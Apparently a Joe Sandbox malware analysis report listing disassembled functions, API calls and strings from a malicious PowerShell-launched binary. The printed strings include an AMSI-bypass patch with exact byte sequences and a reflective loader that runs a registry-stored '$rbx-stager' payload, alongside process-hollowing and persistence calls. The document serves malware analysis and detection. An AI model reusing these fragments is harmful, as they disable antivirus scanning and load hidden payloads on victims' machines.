Part of subcall function 004011AD: SysAllocString.OLEAUT32(SYSTEM), ref: 004011F4
Part of subcall function 004011AD: CoInitializeEx.OLE32(00000000,00000000), ref: 004011FB
Part of subcall function 004011AD: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401215
Part of subcall function 004011AD: CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 0040123E
Part of subcall function 004011AD: VariantInit.OLEAUT32(?), ref: 00401250

Part of subcall function 0040151A: SysAllocString.OLEAUT32($rbx-svc64), ref: 0040152C
Part of subcall function 0040151A: SysAllocString.OLEAUT32(0040218C), ref: 00401538
Part of subcall function 0040151A: CoInitializeEx.OLE32(00000000,00000000), ref: 0040153F
Part of subcall function 0040151A: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401559
Part of subcall function 0040151A: CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 00401582
Part of subcall function 0040151A: VariantInit.OLEAUT32(?), ref: 00401594

Strings

$rbx-svc64, xrefs: 00401835
EXE, xrefs: 004017AB
SOFTWARE, xrefs: 004017F7
$rbx-stager, xrefs: 00401810
$rbx-svc32, xrefs: 00401827

Memory Dump Source

Source File: 00000022.00000002.2450027885.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_400000_powershell.jbxd

Similarity

API ID: String$Alloc$Initialize$Resource$CreateInitInstanceProcessSecurityVariant$FreeHeap$CurrentFindLoadLockOpenSizeofUninitializeValueWow64
String ID: $rbx-stager$$rbx-svc32$$rbx-svc64$EXE$SOFTWARE
API String ID: 2402434814-2001424239
Opcode ID: 80d2da82d41cd1101cb0fa336117fbe1f9f1514eb18b9611fb588a91be9c79d8
Instruction ID: 66d5473efb4f301b2503ca24c6ba2de9d178356673c05167290160cc1cb4c15a
Opcode Fuzzy Hash: 80d2da82d41cd1101cb0fa336117fbe1f9f1514eb18b9611fb588a91be9c79d8
Instruction Fuzzy Hash: 541191727003156BEB1527725E8DE6B299D9B85794B14443BBA05F62E2EEB8CD00C1A8

Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptAcquireContextW.ADVAPI32(00401A2F,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000000,00000000,00000000,00000000,00000000,?,00401A2F), ref: 0040101E
CryptGenRandom.ADVAPI32(00401A2F,00004000,00000000,?,00401A2F), ref: 0040102D
CryptReleaseContext.ADVAPI32(00401A2F,00000000,?,00401A2F), ref: 00401039

Strings

Microsoft Base Cryptographic Provider v1.0, xrefs: 0040100E

Memory Dump Source

Source File: 00000022.00000002.2450027885.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_400000_powershell.jbxd

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID: Microsoft Base Cryptographic Provider v1.0
API String ID: 1815803762-291530887
Opcode ID: 7b900a4f350d734c292f5c1c4b13f0c1982cf59fedc7216eb164ff64d53fea36
Instruction ID: b3acd7e835805075c9d1b27062e8bfe6e8ad1c0e86411dcbfca9405e651f33df
Opcode Fuzzy Hash: 7b900a4f350d734c292f5c1c4b13f0c1982cf59fedc7216eb164ff64d53fea36
Instruction Fuzzy Hash: C9E0E5726002247BEB304B959E8DF8B3A6CDB80654F200036B704F2190D5B08D00D268

Function 00401868 Relevance: 47.3, APIs: 8, Strings: 19, Instructions: 86
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,00008000,00000000,00000000,00000000,00401827,?,?,?,?,?,0040179D), ref: 00401872
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 00401879
StrCpyW.SHLWAPI(00000000,00402238), ref: 00401888
StrCatW.SHLWAPI(00000000,function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]), ref: 004018A3

Part of subcall function 0040112F: GetCurrentProcess.KERNEL32(?,00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 0040113D
Part of subcall function 0040112F: IsWow64Process.KERNEL32(00000000,?,?,004018AA,?,?,?,?,?,0040179D), ref: 00401144

StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);), ref: 004018BB
StrCatW.SHLWAPI(00000000,[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe), ref: 004018C3
StrCatW.SHLWAPI(00000000,[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$rbx-stager`)).EntryPoint.In), ref: 004018CB
StrCatW.SHLWAPI(00000000,00402238), ref: 004018CF

Strings

[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);, xrefs: 004018B5
[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$rbx-stager`)).EntryPoint.In, xrefs: 004018C5
Kernel32Ptr, xrefs: 00401938
LoadLibraryPtr, xrefs: 00401944
TypeBuilder, xrefs: 004018FC
VirtualProtectDelegate, xrefs: 0040192C
AmsiScanBufferPtr, xrefs: 00401968
AmsiPtr, xrefs: 0040195C
ParameterTypes, xrefs: 004018E4
NativeMethods, xrefs: 00401908
function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type], xrefs: 0040189D
Get-Delegate, xrefs: 004018D8
[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);, xrefs: 004018AE
VirtualProtectPtr, xrefs: 00401950
GetProcAddress, xrefs: 00401914
ReturnType, xrefs: 004018F0
OldProtect, xrefs: 00401974
[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe, xrefs: 004018BD
LoadLibraryDelegate, xrefs: 00401920

Memory Dump Source

Source File: 00000022.00000002.2450027885.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_400000_powershell.jbxd

Similarity

API ID: Process$Heap$AllocCurrentWow64
String ID: AmsiPtr$AmsiScanBufferPtr$Get-Delegate$GetProcAddress$Kernel32Ptr$LoadLibraryDelegate$LoadLibraryPtr$NativeMethods$OldProtect$ParameterTypes$ReturnType$TypeBuilder$VirtualProtectDelegate$VirtualProtectPtr$[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(`SOFTWARE`).GetValue(`$rbx-stager`)).EntryPoint.In$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);$[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);$[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBuffe$function Local:Get-Delegate{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ParameterTypes,[Parameter(Position=1)][Type]
API String ID: 2666690646-646820343
Opcode ID: 3f5c978e97a954265763d819c8a7a71c785032f2f8244d135faac9b6795907b0
Instruction ID: f846a874a752e31dd56dc30a4e6b8ff2ba80a14d39c5350a1e27bccbc54df91f
Opcode Fuzzy Hash: 3f5c978e97a954265763d819c8a7a71c785032f2f8244d135faac9b6795907b0
Instruction Fuzzy Hash: 6D219D9030292067D5163A621A6A92F980E8BC1B46710C03FB9457F7E9DF7D8F038BDE

Function 004019E1 Relevance: 43.9, APIs: 22, Strings: 3, Instructions: 166
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,00008000,75B12EB0,00000000,00402238), ref: 004019F4
HeapAlloc.KERNEL32(00000000), ref: 00401A01
GetProcessHeap.KERNEL32(00000000,00004000), ref: 00401A15
HeapAlloc.KERNEL32(00000000), ref: 00401A1C

Part of subcall function 00401000: CryptAcquireContextW.ADVAPI32(00401A2F,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000000,00000000,00000000,00000000,00000000,?,00401A2F), ref: 0040101E
Part of subcall function 00401000: CryptGenRandom.ADVAPI32(00401A2F,00004000,00000000,?,00401A2F), ref: 0040102D
Part of subcall function 00401000: CryptReleaseContext.ADVAPI32(00401A2F,00000000,?,00401A2F), ref: 00401039

StrStrIW.KERNELBASE(?,004037F8), ref: 00401A46
StrStrIW.SHLWAPI(00000002,004037F8), ref: 00401A6D
StrNCatW.SHLWAPI(00000000,?,?), ref: 00401A84
StrCatW.SHLWAPI(00000000,004037FC), ref: 00401A90
StrCatW.SHLWAPI(?,'+[Char](), ref: 00401AE8
StrCatW.SHLWAPI(?,?), ref: 00401AF2
StrCatW.SHLWAPI(?,'+'), ref: 00401B1C
StrCatW.SHLWAPI(00000000,?), ref: 00401B2C
StrCatW.SHLWAPI(00000000,004037FC), ref: 00401B47
StrStrIW.SHLWAPI(?,004037F8), ref: 00401B61
StrCatW.SHLWAPI(00000000,?), ref: 00401B75
StrCpyW.SHLWAPI(?,00000000), ref: 00401B7C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401B8A
HeapFree.KERNEL32(00000000), ref: 00401B93
GetProcessHeap.KERNEL32(00000000,?), ref: 00401B99
HeapFree.KERNEL32(00000000), ref: 00401B9C

Strings

'+[Char](, xrefs: 00401ADF
)+', xrefs: 00401AF4
'+', xrefs: 00401AFB, 00401B03, 00401B17

Memory Dump Source

Source File: 00000022.00000002.2450027885.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_400000_powershell.jbxd

Similarity

API ID: Heap$Process$Crypt$AllocContextFree$AcquireRandomRelease
String ID: '+'$'+[Char]($)+'
API String ID: 3510167801-3465596256
Opcode ID: 77fbc5ad9c9726f67d2081292eef2cd34d774a8d956c2c838f39666ce6063c67
Instruction ID: 881abd296b23407031799d902d2f4cdc89e37ab1eeb299f195f03ae3526d8067
Opcode Fuzzy Hash: 77fbc5ad9c9726f67d2081292eef2cd34d774a8d956c2c838f39666ce6063c67
Instruction Fuzzy Hash: B051F1B1E00219ABCB14DFB4DD49AAE7BBDFB48301B14446AF605F7290DB78DA01DB64

Function 0040151A Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32($rbx-svc64), ref: 0040152C
SysAllocString.OLEAUT32(0040218C), ref: 00401538
CoInitializeEx.OLE32(00000000,00000000), ref: 0040153F
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401559
CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 00401582
VariantInit.OLEAUT32(?), ref: 00401594
VariantInit.OLEAUT32(?), ref: 00401609
CoUninitialize.COMBASE ref: 00401659
SysFreeString.OLEAUT32(00000000), ref: 00401666
SysFreeString.OLEAUT32(?), ref: 0040166B

Strings

$rbx-svc64, xrefs: 0040152A, 0040152B
$rbx-svc32, xrefs: 00401520

Memory Dump Source

Source File: 00000022.00000002.2450027885.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_400000_powershell.jbxd

Similarity

API ID: String$AllocFreeInitInitializeVariant$CreateInstanceSecurityUninitialize
String ID: $rbx-svc32$$rbx-svc64
API String ID: 2407135876-384997928
Opcode ID: 7425de0db50bf038e31b53769003f6f27261718ef458d0c48b03b975902a686c
Instruction ID: a7557972db62563d574e16152cd358301487189799b80a26eca7dc015dd46a94
Opcode Fuzzy Hash: 7425de0db50bf038e31b53769003f6f27261718ef458d0c48b03b975902a686c
Instruction Fuzzy Hash: FE414471E00219AFDB01EFA4CD899AFBBBDEF49314B140469FA05FB290C6B59D45CB60

Function 00401674 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 128
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32($rbx-svc32), ref: 00401686
SysAllocString.OLEAUT32(0040218C), ref: 00401690
CoInitializeEx.COMBASE(00000000,00000000), ref: 00401699
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 004016B3
CoCreateInstance.OLE32(004020A8,00000000,00000001,00402088,?), ref: 004016DC
VariantInit.OLEAUT32(?), ref: 004016EE
CoUninitialize.COMBASE ref: 0040177A
SysFreeString.OLEAUT32(?), ref: 0040178C
SysFreeString.OLEAUT32(00000000), ref: 0040178F

Strings

$rbx-svc32, xrefs: 0040167A, 00401685

Memory Dump Source

Source File: 00000022.00000002.2450027885.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_400000_powershell.jbxd

Similarity

API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
String ID: $rbx-svc32
API String ID: 4184240511-186198907
Opcode ID: 9c4a86625b947a533870ca7b44a4e38c24d4bbb506b8e5284733e84da50932fe
Instruction ID: fe73214060e0a71e5cb08311afe73f66ef618dc69d1aaa4bc8de0f8b6e607afc
Opcode Fuzzy Hash: 9c4a86625b947a533870ca7b44a4e38c24d4bbb506b8e5284733e84da50932fe
Instruction Fuzzy Hash: 85314471A00218AFDB01EFA8CD88DAF7B7DEF49354B104069FA05FB190C6B5AD05CBA4

Function 00401986 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 36
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Get-Delegate,00000000,00402238), ref: 00401999
StrStrIW.SHLWAPI(00000000,Get-Delegate), ref: 004019B5
StrStrIW.SHLWAPI(?,Get-Delegate,75B12EB0), ref: 004019D2

Strings

Get-Delegate, xrefs: 00401995, 004019B3, 004019C9

Memory Dump Source

Source File: 00000022.00000002.2450027885.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_400000_powershell.jbxd

Similarity

API ID: lstrlen
String ID: Get-Delegate
API String ID: 1659193697-1365458365
Opcode ID: e6e519078ed7ec1137922d894eaa91ee248194be5355f25f52c42e074d7245ff
Instruction ID: 00c31201c37e283d491a5759d1d7e9797cf0b304d52834bac4b81ed49e19cba9
Opcode Fuzzy Hash: e6e519078ed7ec1137922d894eaa91ee248194be5355f25f52c42e074d7245ff
Instruction Fuzzy Hash: 7EF05B71700218ABDB145BA59E48B9FB7FCAF44344F040077E505F3290EA749E01C664

Function 00401798 Relevance: 3.0, APIs: 2, Instructions: 3
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004017A5: FindResourceA.KERNEL32(00000000,00000065,EXE), ref: 004017B5
Part of subcall function 004017A5: SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017C8
Part of subcall function 004017A5: LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,0040179D), ref: 004017DA
Part of subcall function 004017A5: LockResource.KERNEL32(00000000,?,?,?,?,?,0040179D), ref: 004017E5
Part of subcall function 004017A5: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE,00000000,000F013F,?,?,?,?,?,?,0040179D), ref: 00401801
Part of subcall function 004017A5: RegSetValueExW.KERNELBASE(?,$rbx-stager,00000000,00000003,00000000,00000000,?,?,?,?,?,0040179D), ref: 00401818

ExitProcess.KERNEL32 ref: 0040179E

Memory Dump Source

Source File: 00000022.00000002.2450027885.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_400000_powershell.jbxd

Similarity

API ID: Resource$ExitFindLoadLockOpenProcessSizeofValue
String ID:
API String ID: 3836967525-0
Opcode ID: 6f5a291add5b719a9ef9962163c102a842408bd3c615f02f78525d4f468f85bb
Instruction ID: 349935dfe58169e56b8de0d8f460e35c8f36df872e6f4d206b9f951cc53eac22
Opcode Fuzzy Hash: 6f5a291add5b719a9ef9962163c102a842408bd3c615f02f78525d4f468f85bb
Instruction Fuzzy Hash:

Non-executed Functions

Function 0040118E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 10
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,00401178,?), ref: 00401193
GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 004011A3

Strings

ntdll.dll, xrefs: 0040118E
RtlGetVersion, xrefs: 0040119D

Memory Dump Source

Source File: 00000022.00000002.2450027885.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_400000_powershell.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: RtlGetVersion$ntdll.dll
API String ID: 1646373207-1489217083
Opcode ID: ee2441e5e750a461a1f1097b91d62800b241895c27a46cee72e654fece4d54b8
Instruction ID: 0863f5cf0c3234c6e1236f6f2d3f4997342a4c328dcd20e5af414fba7a7cf28b
Opcode Fuzzy Hash: ee2441e5e750a461a1f1097b91d62800b241895c27a46cee72e654fece4d54b8
Instruction Fuzzy Hash: D2C09B70F807006AFF151F709F0DB17295859487023540573B305F51D4DAFCC404D52C

Analysis Process: powershell.exePID: 5948, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	10.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	44.4%
Total number of Nodes:	27
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9B810C6D Relevance: 1.6, APIs: 1, Instructions: 130
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtWriteVirtualMemory.NTDLL ref: 00007FFD9B810D37

Memory Dump Source

Source File: 00000023.00000002.2722180586.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b800000_powershell.jbxd

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 4fbfb29fda0ec05ac5a7bac9e9b50ce2e8e63422ab841035bb321bc2e1e1d08b
Instruction ID: 480580c0a010a5b078c1763f1dac89e307ddcfe2f4640916a491fcec1eedcbc7
Opcode Fuzzy Hash: 4fbfb29fda0ec05ac5a7bac9e9b50ce2e8e63422ab841035bb321bc2e1e1d08b
Instruction Fuzzy Hash: 7331D13191DA4C8FDB18EF58D845AE9BBE0FB5A321F04426FD049D3692CB70A806CB85

Function 00007FFD9B80E088 Relevance: 1.6, APIs: 1, Instructions: 122
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 00007FFD9B810B0B

Memory Dump Source

Source File: 00000023.00000002.2722180586.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b800000_powershell.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: 508c70521e0cf1bfa4ca3e3ce6f09ed8a5f8ead4f1a58e743e6404c5cec75bbb
Instruction ID: 0f55708262654c33424e3654b97f05aa700e6f21a6b05c0323db5ba6c2ede3c7
Opcode Fuzzy Hash: 508c70521e0cf1bfa4ca3e3ce6f09ed8a5f8ead4f1a58e743e6404c5cec75bbb
Instruction Fuzzy Hash: 82314672A0E64C8FEB58DB98D8496A97BF0FBA9310F04406FD089C7163D621A946C751

Function 00007FFD9B80E0EA Relevance: 1.6, APIs: 1, Instructions: 120
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtWriteVirtualMemory.NTDLL ref: 00007FFD9B810D37

Memory Dump Source

Source File: 00000023.00000002.2722180586.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b800000_powershell.jbxd

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 307b37fe8615ee4ab7b6673974b672b5d9fe178978e2744aae1e4ebc0d95c0f4
Instruction ID: c8d141355b9a70a82af955b63ef15528488a92e5d3787d311a15e548f67b0c62
Opcode Fuzzy Hash: 307b37fe8615ee4ab7b6673974b672b5d9fe178978e2744aae1e4ebc0d95c0f4
Instruction Fuzzy Hash: 0431A37191CA0C8FDB58EF9CD8496F9BBF0FB59711F00422ED04AD3652CB70A8068B85

Function 00007FFD9B810FF4 Relevance: 1.6, APIs: 1, Instructions: 115
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtResumeThread.NTDLL ref: 00007FFD9B8110A5

Memory Dump Source

Source File: 00000023.00000002.2722180586.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b800000_powershell.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: fdefe168d53204d854c5683e0fc882bc7013cbeb17c4293a593048fb6347fe03
Instruction ID: 12c4a77abcdfa3c2f5067cf2498ce1d007eafa28a285e236155257598741dbe0
Opcode Fuzzy Hash: fdefe168d53204d854c5683e0fc882bc7013cbeb17c4293a593048fb6347fe03
Instruction Fuzzy Hash: B031E431E0C64C8FDB58DF98D8467E9BBE1EF6A321F04416BD049D3296CB70A846CB91

Function 00007FFD9B810A4E Relevance: 1.6, APIs: 1, Instructions: 115
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 00007FFD9B810B0B

Memory Dump Source

Source File: 00000023.00000002.2722180586.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b800000_powershell.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: 50574ea68c34f3fc1e268e4537a2e3116758d01c98cc23a7a2ca31a3f57d37a4
Instruction ID: 7afd1ad98ca50a7b71713fb5c05da3d16aa7bb602c8104e77ecf39435dff67b7
Opcode Fuzzy Hash: 50574ea68c34f3fc1e268e4537a2e3116758d01c98cc23a7a2ca31a3f57d37a4
Instruction Fuzzy Hash: A731F63090D6888FDB5ADF68C846BE97FF0EF66320F04429FD049C71A7D664A446CB92

Function 00007FFD9B80E0B8 Relevance: 1.6, APIs: 1, Instructions: 102
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 00007FFD9B810B0B

Memory Dump Source

Source File: 00000023.00000002.2722180586.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b800000_powershell.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: 99abbf360738f4902c3222423957fb5c7d07efe2a1c3b926e4819aedec52a5b0
Instruction ID: 04176260b38a25e9dec8ed508c39232570be2dc9aaee5bc7677f9c3ed5efba8f
Opcode Fuzzy Hash: 99abbf360738f4902c3222423957fb5c7d07efe2a1c3b926e4819aedec52a5b0
Instruction Fuzzy Hash: 3E21D571A0DA0C8FDB58DF98D8497E97BE0EBA9320F04416ED04ED3262D675A846CB51

Function 00007FFD9B810F30 Relevance: 1.6, APIs: 1, Instructions: 98
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtSetContextThread.NTDLL ref: 00007FFD9B810FBB

Memory Dump Source

Source File: 00000023.00000002.2722180586.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b800000_powershell.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: 4dd787efe090bebee811ddcc184d8dffe193062821f69ee477531355e6d3409e
Instruction ID: 79acd357f9a0236292d080c654d2794f48c52fb4f19dc83a0e568b4a5c5c5d77
Opcode Fuzzy Hash: 4dd787efe090bebee811ddcc184d8dffe193062821f69ee477531355e6d3409e
Instruction Fuzzy Hash: E721D631A0C64C8FDB58DF5CD84A7E97BF0EB69320F04416FD049D7252C6709846CB51

Function 00007FFD9B80E132 Relevance: 1.6, APIs: 1, Instructions: 97
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtResumeThread.NTDLL ref: 00007FFD9B8110A5

Memory Dump Source

Source File: 00000023.00000002.2722180586.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b800000_powershell.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: e8aede2658e92a5e4e47aafdfd5cf214caf6a636337f48914a05a4a7586cb5cb
Instruction ID: 7133e4bb9ca5f2afd5c7fc1afb3621dee621efc5c095e20eb5d2a01c554fea47
Opcode Fuzzy Hash: e8aede2658e92a5e4e47aafdfd5cf214caf6a636337f48914a05a4a7586cb5cb
Instruction Fuzzy Hash: F8219171A08A1C8FDB58EF98D84ABE9BBE1EB59311F00416ED00DD3255DB70A8468B91

Function 00007FFD9B80E112 Relevance: 1.6, APIs: 1, Instructions: 92nativethreadCOMMON

Download Yara Rule

APIs

NtSetContextThread.NTDLL ref: 00007FFD9B810FBB

Memory Dump Source

Source File: 00000023.00000002.2722180586.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b800000_powershell.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: b9719be189b5ca03971846174e4ec4078c275b46ee87b424947ac382692295e8
Instruction ID: b0862cde38a7893e59a987f3704d19986f8ae08fa58f8cf51716d57e8ffa2911
Opcode Fuzzy Hash: b9719be189b5ca03971846174e4ec4078c275b46ee87b424947ac382692295e8
Instruction Fuzzy Hash: AD217471A0CA0C8FDB58DF9CD84ABF977E0EBA9321F00416ED04DD3255D671A846CB91

Function 00007FFD9B80E122 Relevance: 1.6, APIs: 1, Instructions: 92nativethreadCOMMON

Download Yara Rule

APIs

NtSetContextThread.NTDLL ref: 00007FFD9B810FBB

Memory Dump Source

Source File: 00000023.00000002.2722180586.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b800000_powershell.jbxd

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: b9719be189b5ca03971846174e4ec4078c275b46ee87b424947ac382692295e8
Instruction ID: b0862cde38a7893e59a987f3704d19986f8ae08fa58f8cf51716d57e8ffa2911
Opcode Fuzzy Hash: b9719be189b5ca03971846174e4ec4078c275b46ee87b424947ac382692295e8
Instruction Fuzzy Hash: AD217471A0CA0C8FDB58DF9CD84ABF977E0EBA9321F00416ED04DD3255D671A846CB91

Function 00007FFD9B810231 Relevance: 6.1, APIs: 1, Strings: 2, Instructions: 892
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE ref: 00007FFD9B81094D

Strings

ezB, xrefs: 00007FFD9B810691
ezB, xrefs: 00007FFD9B810996

Memory Dump Source

Source File: 00000023.00000002.2722180586.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b800000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID: ezB$ezB
API String ID: 963392458-3585179095
Opcode ID: 97c1db02291acafab74fcad24234ae445b93b05962c6695182d577d4772ebb75
Instruction ID: bd2dc084b4b0fb00bbd9130ceac061487345ac8937c00333c6b5a3c2cc1a15c0
Opcode Fuzzy Hash: 97c1db02291acafab74fcad24234ae445b93b05962c6695182d577d4772ebb75
Instruction Fuzzy Hash: 08D1053061DA8D8FEB64DF2CDC567E977E0FF59310F01426AD88DC7292DA34A5418B82

Function 00007FFD9B80EB0A Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 245
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

